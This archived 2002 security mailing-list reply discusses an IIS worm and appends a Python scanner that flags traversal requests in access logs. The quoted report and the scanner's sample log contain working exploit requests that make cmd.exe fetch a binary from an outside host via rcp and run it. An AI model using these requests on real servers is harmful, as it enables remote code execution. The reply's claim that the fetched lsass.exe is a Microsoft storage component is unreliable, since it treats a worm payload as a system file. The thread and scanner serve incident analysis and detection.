Security Incidents mailing list archives
Re: new IIS worm? (rcp lsass.exe)
From: Michael Thompson <mike () thompsonmike co uk>
Date: Mon, 23 Sep 2002 01:25:30 +0100
Hello Christian,

On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my TimeZone) you wrote:

CM> hi,
CM> since about a week I notice attempts to exploit vulnerable IIS installations
CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
CM> that seem to try and load an "lsass.exe" file via rcp.
CM> As a search of google and securityfocus turned up nothing, I'll throw in
CM> what I gathered so far and ask if anybody can identify this: (it seems
CM> the affected customer's systems weren't vulnerable, so I don't know what
CM> the worm's further actions are).
CM> The first part is a SYN scan for port 80, with the source port set to 80,
CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
CM> on the single /24 slower and less noticeable (in the case I've seen, it
CM> has some 30 seconds between packets to consecutive addresses).
CM> Then it seems to go after the web servers, sending the following:
CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
CM> and
CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but
CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.
CM> Yes, and the IP address doing the scanning + exploit attempts is different
CM> from the one which provides lsass.exe; the scanning machine seems to be
CM> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8.
CM> regards,
CM> cm.

lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is responsible for managing secure storage in those environments.

--
Best regards,
Michael
http://wwww.thompsonmike.co.uk/
PGP KeyID := 0x3CC985FA
I just can't put it down.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
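The requests quoted in the thread are the classic IIS directory-traversal pattern: `..%5c` (an encoded backslash) walks out of `/scripts/` into `winnt/system32/cmd.exe`, and the query string carries the command to run. The following is an added example, not code from the list or from either poster, showing how a defender can pick such requests out of web-server access logs: it decodes the path twice (so the `%255c` double-encoded variant that the snort "multiple decode" signature is named for is also caught), folds backslashes into forward slashes, and reconstructs the command the attacker asked `cmd.exe` to run. The log lines are constructed for the example, using documentation IP addresses rather than the ones reported in the thread.

```python
"""Flag IIS directory-traversal / cmd.exe requests in web server access logs.

Added example for this thread; the log lines below are constructed, and the
IP addresses are RFC 5737 documentation addresses, not those seen by the poster.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format. Lines 1-2 mirror the two
# requests quoted in the thread, line 3 is benign, line 4 is the
# double-encoded (%255c) variant that a single decode would miss.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Sep/2002:20:17:48 +0200] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+203.0.113.7.lp:lsass.exe+. HTTP/1.0" 200 512
192.0.2.10 - - [21/Sep/2002:20:17:49 +0200] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0" 200 0
192.0.2.11 - - [21/Sep/2002:20:18:01 +0200] "GET /index.html HTTP/1.0" 200 1043
192.0.2.12 - - [21/Sep/2002:20:18:05 +0200] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(raw_path):
    """Decode the path the way a lenient server might: decode twice (so
    %255c -> %5c -> backslash is caught) and fold backslashes into slashes."""
    decoded = unquote(unquote(raw_path))
    return decoded.replace("\\", "/").lower()


def classify_request(target):
    """Return a dict describing a traversal / cmd.exe attempt, or None if benign."""
    path, _, query = target.partition("?")
    norm = normalize_path(path)
    traversal = "/../" in norm or norm.startswith("../")
    cmd_exe = norm.endswith("/cmd.exe")
    if not (traversal or cmd_exe):
        return None
    # "/c+rcp+-b+host:file+." is the command line handed to cmd.exe;
    # '+' is the URL encoding of a space here.
    command = unquote(query).replace("+", " ").strip() if query else ""
    return {
        "traversal": traversal,
        "cmd_exe": cmd_exe,
        "command": command,
        "normalized": norm,
    }


def scan_log(text):
    """Parse CLF lines and return one finding per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), status=int(m.group("status")))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        # A 200 on a cmd.exe request is the one to chase: the server executed it.
        print(hit["ip"], hit["status"], hit["command"])
```

The status code matters as much as the match: a 404 says the traversal was attempted and refused, while a 200 on a `cmd.exe` target means the server ran the command, and the reconstructed command line (here an `rcp` fetch followed by execution of the fetched file) tells you what to look for on the host.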